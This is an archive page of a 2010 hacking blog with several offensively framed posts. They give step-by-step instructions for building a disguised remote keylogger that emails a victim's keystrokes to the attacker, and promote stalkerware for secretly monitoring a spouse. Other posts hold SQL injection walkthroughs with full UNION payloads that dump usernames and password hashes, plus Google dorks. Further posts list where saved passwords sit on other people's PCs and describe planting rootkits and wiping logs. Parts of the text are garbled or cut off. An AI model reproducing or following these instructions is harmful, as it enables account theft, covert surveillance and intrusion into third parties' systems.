Write at HWS !!!

Guest Posting

How secure is your Computer ?

Check out your computer safety here . A lot of tools , tricks and hacks related to computer .

Blogger Tips and Tricks

A Lot of tips ,tricks and hacks related to blogger . Seo tricks to get maximum targetted traffic to your blog.

Easy ways to Earn Online

Online earning is not so difficult but it needs a lot of patience and hardwork. Here are some techniques to earn money through internet.

Facebook Tricks

A lot of facebook tips , tricks and hacks.It requires a lot of time but reading is must.

Pro Hacking

If you have knowledge about basic techniques then try this,but be careful as it is highly toxic.

Showing newest 10 of 24 posts from May 2010. Show older posts
Showing newest 10 of 24 posts from May 2010. Show older posts

Wednesday, May 26, 2010

Hack a Facebook password with winspy (Video)

I have made a couple of tutorials on winspy , but most of the people which are new to this subject failed to understand it,so therefore i am posting a video which will help you to hack a facebook password with a winspy keylogger.Winspy keylogger is a complete stealth mode spyware keylogger that will record both Local and remote computer.

Steps followed in the video:
First of all download Winspy keylogger software from link given below:

2. After downloading winspy keylogger to hack Facebook account password, run the application. On running, a dialog box will be prompted. Now, create an user-id and password on first run and hit apply password. Remember this password as it is required each time you start Winspy and even while uninstalling.

3. Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger software.
Winspy keylogger to hack gmail account password

4. Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Winspy keylogger to hack gmail passwsord

5. Now, Winspy’s main screen will be displayed as shown in image below:

6. Select Remote at top, then Remote install.
7. On doing this, you will get a popup box as shown in image. Now, fill in the following information in this box.
hack gmail password

.user - type in the victim’s name
.file name - Name the file to be sent. Use the name such that victim will love to accept it.
.file icon - keep it the same
.picture - select the picture you want to apply to the keylogger.
In the textfield of “Email keylog to”, enter your email address. Hotmail accounts do not accept keylog files, so use another emailaccount id,my sugession is using a Gmail id
Thats it. This much is enough. If you want, can change other settings also.
8. After you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Facebook account password.

Tuesday, May 25, 2010

Facebook is banned in Pakistan

Facebook has been banned in Pakistan because of protest by the whole nation . The reason behind it is that on 20th of May an event is held on many pages of facebook about the Sketching of Holy Prophet(P.B.U.H) , which is unbearable for the Muslims so they protest and eventually facebook is banned in many muslim countries including Pakistan.

I think facebook should apologize for their act and should remove all such pages. We should respect all the religions ,i think its the real humanity.


No more Adsense accounts in India

Its A Very Sad News To Share ...

Adsense Stopped Approving New Accounts To India Neither You Can Change It From Some other Country To India
Basically It Means No More Accounts For Indians

The Only Way To Get An Account Is Make A Blog Now Keep Updating It A Little Bit For Six Months

And After 6 Months You Might Get An Account With That Blog

And Even Pakistan Is Also Added To The List Of Those Countries Where You Cannot Change Payee Name Neither Address And 6 Months Restriction Is Also Applied I Think

No sure For The Last Point

But Indeed a Very Sad News .....

How to catch a cheating spouse

Is your spouse cheating you? Do you want to catch a cheating spouse? Studies reveal that:
  • Only 46% of men believe that online affairs are adultery. (DivorceMag)
  • Up to 37% of men and 22% of women admit to having affairs. Researchers think the vast majority of the millions of people who visit chat rooms, have multiple "special friends". (Dr. Bob Lanier, askbob.com)
  • One-third of divorce litigation is caused by online affairs. (The Fortino Group)
  • Approximately 70% of time on-line is spent in chatrooms or sending e-mail; of these interactions, the vast majority are romantic in nature. (Dr. Michael Adamse, PhD., co-author of "Affairs of the Net: The Cybershrinks' Guide to Online Relationships")

IF you are in a same situation then dont worry, Rafayhackingarticles has got a solution for you:

These computer monitoring software will log and record what your spouse types, who they talk to, documents they open and print, what websites they visit, software titles they run, emails they send and receive, and even screenshots of their actual online activities.
Stop your cheating spouse in their tracks with our powerful monitoring spy software.

  RafayHackingArticles recommends following three spywares:
Remote password hacking software
Sniperspy - Remote monitoring

SniperSpy is the industry leading Remote password  hacking software combined with the remote install and  Remote Viewing feature. Once installed on the remote pc(s) you wish, you only need  to login to your own personal SniperSpy account to view  activity logs of the remote PC’s!  This means that you can  view logs of the remote PC’s from anywhere in the world as  long as you have internet access

Spytech Realtime-Spy 

Realtime-Spy is the latest in cutting-edge computer monitoring technology that allows you to monitor ANY PC from ANYWHERE. Realtime-Spy is remotely deployable (no physical installation needed), and its activity logs are accessible from anywhere - regardless if the remote PC is online or not. Once installed, Realtime-Spy monitors the remote PC in total stealth, and cloaks itself to avoid being detected. Monitors keystrokes, website visits, windows viewed, and more!

Spytech Keystroke Spy  Keystroke Spy is a cost-effective monitoring solution that  allows you to easily, and efficiently log what your computer  users are doing. Keystroke Spy is a powerful tool that can  log every keystroke users type. Keystroke Spy can run in  total stealth, email you when specific keywords are typed , and can even be set to log keystrokes only typed in specific applications.

Sunday, May 23, 2010

Hack websites using Auto SQL I Helper

In the recent posts we have seen the hacking of a site using manual SQL injection,which is essential to know the basics of SQL.Now we are going to check advanced SQL INJECTION.

At the begening "SQLIHelperV.2.7" is a tool that will hack vulnerable websites using SQL injection. You don't have to spend hours and hours trying to find your way in a website and trying hundreds of combinations and codes to hack a website.
This tool will do it all by itself. You only have to tell her what do and where to look.

Lets start.
first you need to find the potential website that you think it might be possible to hack it. Remember that some websites are simply unhackable.

After you find your website ( better to end with "article.php?id=[number]" ) example: "http://encycl.anthropology.ru/article.php?id=1";

Check if your website can be hacked by trying to go this address :
http://www.domain.com/article.php?id=&amp;amp;#39;1 <------ notice the ' before the number 1.

you should get this message:

Query failedYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'1 ORDER BY lastname' at line 1 SELECT * FROM person_old WHERE id=\'1 ORDER BY lastname

This mean that this website can be hacked because you get an error.

Now open your SQL I Helper V.2.7
and write the link :
http://www.domain.com/article.php?id=1 <---- without the '

and press the inject button.

Now you should wait until the tool finish searching for columns . Time may vary depending on your connection speed , your pc speed , and the number of columns in the website.

Make sure that the website support union otherwise the injection won't work.

Now select any element from the "database name" box and press the "Get tables" button ,

then select any element from the "table name" box and press the "Get columns" button

then select any elements you want from the "columns name" box and press "Dump Now"

After clicking "Dump Now" , u will see some hashes

Now copy the hash on a peace of paper and go to this website:


enter the hash and press the button "Crack that hash baby!" and you should get the source of the hash.

Softwares for SQL injection

Now we are going to see some sites which will help in SQL INJECTION
You can find whether the site iz vulnerable for SQL INJECTION or not thru this link
Link : http://sql.wehostsite.com/
The kinda called "part 2" of the sql vuln finder script of mine, just enter the vulnerable site url and it will return you the following
*Order by
*Selection Id
*Database name

SQL commands [useful for Injection]

In the last post we have seen how to hack an online site using SQL injection. This technique is quite easy to use and i think its best technique but it is not applicable on new sites using cpanel. As you have understand the whole technique now i am introducing some useful commands related to SQL injection :

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition
of a table
ALTER TRIGGER -- change the definition
of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment
of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language 
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results
of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows
of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-  
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan
of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row
of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value
of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results
of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode
of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of
the current session
SET TRANSACTION -- set the characteristics
of the current transaction
SHOW -- show the value
of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

Hack sites easily

hello everyone , in the last post we have seen the password hacking if they are saved in the pc.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )

ok buddiez lets start and kindly pay attention

let your mind think and its just a child play

1). Search for a vulnerable site.
Highlight one then press ctrl+c then ctrl+v at your browser address bar.


…and this one is just priceless…
“login: *” “password= *” filetype:xls


inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

3) So the url will be like this:
And we hit enter and we got this result.
Database error: Invalid SQL
: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL
syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1) 
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.

4) The next step is find out how many columns the database contain
To find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL
: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns  

5) Now use "-" (negative quote) and union select statement.
using this we can select more data in one sql
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
, 5

6) Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
, 5
5.1.32 <--this is the version 

7) Getting Table Name.
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:

it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+
we hit enter and got this result:
ticle,ProjectPhoto,active_sessions_split,auth_u ​ser_md5 
8) Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/

aste auth_user_md5 to the text box and click encode.
now we get the hex of
auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+
replace also +from+information_schema.tables+where+ta
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where
Now hit enter: and you got result like this.
tName,MiddleName,LastName,Position,EmailAddre ​ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status 
9) We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P

assword,0x3a,Perms,0x3a,FirstName,0x3a,M ​ iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ​ ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_n
ame=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of
auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10) Because the password is in md5 hash we need to crack it.

: x1R0zYB3bex
u can ask anything u like . 

where saved passwords are stored

it will help u wen u gain acess in someones pc or u using a system or friend or enemy and u want to know his/her passwords ..........


# Internet Explorer 4.00 - 6.00: The passwords are stored in a secret location in the Registry known as the "Protected Storage".
The base key of the Protected Storage is located under the following key:
ft\Protected Storage System Provider".
You can browse the above key in the Registry Editor (RegEdit), but you won't be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

# Internet Explorer 7.00 - 8.00: The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.
HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords. 
# Firefox: The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.

# Google Chrome Web browser: The passwords are stored in [Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This filename is SQLite database which contains encrypted passwords and other stuff)

# Opera: The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

# Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.  

# Outlook Express (All Versions): The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

# Outlook 2002-2008: All new versions of Outlook store the passwords in the same Registry key of the account settings.
The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[
Account Index]
If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

# Windows Live Mail: All account settings, including the encrypted passwords, are stored in [Windows Profile]\Local Settings\Application Data\Microsoft\Windows Live Mail\[Account Name]
The account filename is an xml file with .oeaccount extension.

# ThunderBird: The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.
# Google Talk: All account settings, including the encrypted passwords, are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]

# Google Desktop: Email passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes\[Account Name]

# MSN/Windows Messenger version 6.x and below: The passwords are stored in one of the following locations:

1. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
2. Registry Key: HKEY_CURRENT_USER\Software\Microsoft\MessengerService
3. In the Credentials file, with entry named as "Passport.Net\\*". (Only when the OS is XP or more)

# MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name] 
# Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with "WindowsLive:name=".

# Yahoo Messenger 6.x: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
("EOptions string" value)

# Yahoo Messenger 7.5 or later: The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager - "ETS" value.
The value stored in "ETS" value cannot be recovered back to the original password.

# AIM Pro: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\AIM\AIMPRO\[A
ccount Name]

# AIM 6.x: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

# ICQ Lite 4.x/5.x/2003: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Mirabilis\ICQ\NewOwners\[ICQ Number]
(MainLocation value)

# ICQ 6.x: The password hash is stored in [Windows Profile]\Application Data\ICQ\[User Name]\Owner.mdb (Access Database)
(The password hash cannot be recovered back to the original password)

# Digsby: The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.

# PaltalkScene: The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name].

Real Hacking Steps

1. Information Gathering/Foot printing
2. Port Scanning
3. OS Fingerprinting
4. Banner Grabbing
5. Vulnerability Assessment
6. Search & Build Exploit
7. Attack
8. Maintain Access with help of Root kits and Trojans.
9. Covering Tracks

1. Information Gathering / Foot printing

Informational gathering is the process to get maximum details of target host. It is very important part of remote hacking because when we have more information about target system we can launch more attacks.

Information gathering is done with these steps:
1. Find our company URL / IP address
2. Google for more information from different websites
3. Foot printing Through Job Sites
4. Find out whois record of target domain name (open www.who.is)
5. Find out physical location of victim (open www.whatismyipaddress.com)

Case-Study: 1.1
You are working in your company as a hacker, and your company want physical address and IP address and employee record and domain details. Your company gives u domain name:

1. Open Dos prompt and type ping kulhari.net [Enter] after you will get IP address of victim.
2. Open google.com and search kulhari.net (and browse website for all information’s like contact number, employee records and their services).
3. For domain owner email address and hosting company details open: www.who.is and type www.kulhari.net (any target site).
4. For physical address location of server open www.whatismyipaddress.com and type IP address that you get in step 1. And trace it after that.

Video Link 

2. Port Scanning

What is port?

Port is medium for communication between 2 computers. Every service on a host is identified by a unique 16-bit number called a port.

Some default ports:

Port number ~ Service

7 ~ Ping
21 ~ FTP (File Transfer Protocol)
22 ~ SSH (Secure Shell)
23 ~ Telnet
25 ~ SMTP (Mail)
43 ~ WHOIS
53 ~ DNS
80 ~ HTTP
110 ~ POP3 (Mail Access)
513 ~ Rlogin
8080 ~ Proxy

TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) are two of the protocols that make up the TCP/IP protocol suite which is used universally to communicate on the Internet. Each of these has ports 0 through 65535 available so essentially there are more than 65,000 doors to lock.

The first 1024 TCP ports are called the Well-Known Ports and are associated with standard services such as FTP, HTTP, SMPTP or DNS.

What is port scanning?
It is similar to a thief going through your neighborhood and checking every door and window on each house to see which ones are open and which ones are locked.

What is port scanner?

A port scanner is a piece of software designed to search a network host for open ports. This is often used by administrators to check the security of their networks and by hackers to identify running services on a host with the view to compromising it. To port scan a host is to scan for listening ports on a single target host. To port sweep is to scan multiple hosts for a specific listening port.

Best port scanners: nmap, Hping2, Superscan.
Download link: http://sectools.org/

Why we perform port scanning?

We perform port scanning for finding our open services, so after we can search exploits related to that service and application.

Demo video

NMAP (Port Scanner): A Hacker’s Best Friend

Nmap is a tool that has the ability to detect hosts, scanning ports and Oss. Nmap used in matrix, sword and many hacking movies.

Nmap Modes of operation:

: This method of pinging sends a TCP packet to the host with an ACK flag. If the host replies with an RST, then the host is UP(running).

ICMP Ping: -PI
: This is standard ping used by UNIX / Linux boxes.

Connect (): -ST
: All Linux/Unix systems provide a system call to connect to a machine on a specified port, with a given protocol.

SYN Stealth: -sS
: This is stealth scan in that it does not get logged.

How to Find Out Own computer Ports:
Open Dos prompt and type following command.

C:\> netstat -no
After Show active connections:
Active Connections

Proto ~ Local Address ~ Foreign Address ~ State ~ PID
TCP ~ ~ ~ ESTABLISHED ~ 2148
TCP ~ ~ ~ CLOSE_WAIT ~ 3064
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020
TCP ~ ~ ~ ESTABLISHED ~ 2020

PID is Process ID,
We can find out their associate application with help of following command:

C:\> tasklist

To terminate 2020 PID or another process

C:\> taskkill /PID 2020

After All connections will be close on our system.

NOTE: We can know that our system is infected or not with help of former commands, described.
3. OS Fingerprinting

OS (Operating System) Fingerprinting is a process to find out victim Operating System (Windows, Linux, UNIX).


When exploring a network for security auditing or inventory/administration, you usually want to know more than the bar IP addresses of identified machines. Your reaction to discovering a printer may be different than to finding a router, wireless access point, telephone PBX, game console, Windows desktop, or UNIX server. Finer grained detection (such as distinguishing Mac OS X 10.4 from 10.3) is useful for determining vulnerability to specific flaws and for tailoring effective exploits for those vulnerabilities.

Tools: nmap, NetScanTools Pro, P0f.

4. Banner Grabbing

Banner Grabbing
is an attack designed to deduce the brand and/or version of an operating system or application. Mean after port scanning we found open port 80 (apache) and target OS is Linux, but we don’t know what is version of apache for remote hacking. Like apache 2.0, 2.2, or 2.6.

Example: c:\> telnet 80 [Enter]
Change Target Port 80 to another.
5. Vulnerability Assessment

What is Vulnerability Assessment?
The word “vulnerability” describes a problem (such as a programming bug or common misconfiguration) that allows a system to be attacked or broken into.

A vulnerability assessment
is the process of identifying, quantifying, and prioritizing (or ranking) the vulnerability in a system.

Vulnerability assessments can be conducted for small business to large regional infrastructures. Vulnerability from the perspective of Disaster Management means assessing the threats from potential hazards to the population and to the infrastructure developed in that particular. It can be done in political, social, economic and in environmental fields.

Assessments are typically performed according to the following steps:

1. Cataloging assets and capabilities (resources) in a system.
2. Assigning quantifiable value (or at least rank order) and importance to those resources
3. Identifying the vulnerabilities or potential threats to each resource
4. Mitigating or eliminating the most serious vulnerabilities for the most valuable resources

Automated Tools
: Nessus, Nikto, Core impact, Retina, etc

6. Search & Build Exploit

Manual Method: We can find vulnerability manually with help of vulnerability archive sites like www.milw0rm.com and http://www.packetstormsecurity.org/
For exploit and final attack, open the websites say Microsoft, adobe or Mozilla which provides the source code to format. You need to download the code and compile them for preparing exploit for final attack.
7. Attack
Launch attack on remote system and get reverse shell.

8. Maintain Access
After getting remote access we place a root kit or Trojan virus for future remote access, without any password.
[For more information you’ll have to wait for the next chapter]

9. Covering Tracks
Covering Tracks is a process to delete all logs on the remote system. If target system is Linux or UNIX, delete all entries of /var folder and if it is windows OS delete all events and logs.

Case Study: 1.3

You are working in abc company as a ethical hacker and your company get a contract from government to hack terrorist organization server for getting all their emails.

Ans) 1st we perform Information gathering (like collect information like IP address and physical address). 2nd we perform port scanning to find open ports: 22, 25, 80. And then perform OS fingerprinting with help of nmap and p0f and if result is “Linux 2.6” then next perform banner grabbing on port no: 25 (related to email server) in which command is used:

C:\> telnet abc.com 80
Result is : HTTP 1.1 400 BAD REQUEST
Server: Apache 2.0 Linux

So after we perform manual vulnerability assessment manually with help of www.milw0rm.com and search “Apache 2.0” >> then after download exploit code >> compile the exploit code and attack then take all email backup from remote system.

Project DONE!

Twitter Delicious Facebook Digg Stumbleupon Favorites More


Recent Posts

Join Me On Facebook

200+ Followers


meet women in Ukraine contatore visite website counter

Recent Comments

Follow Me On Twitter

1112+ Followers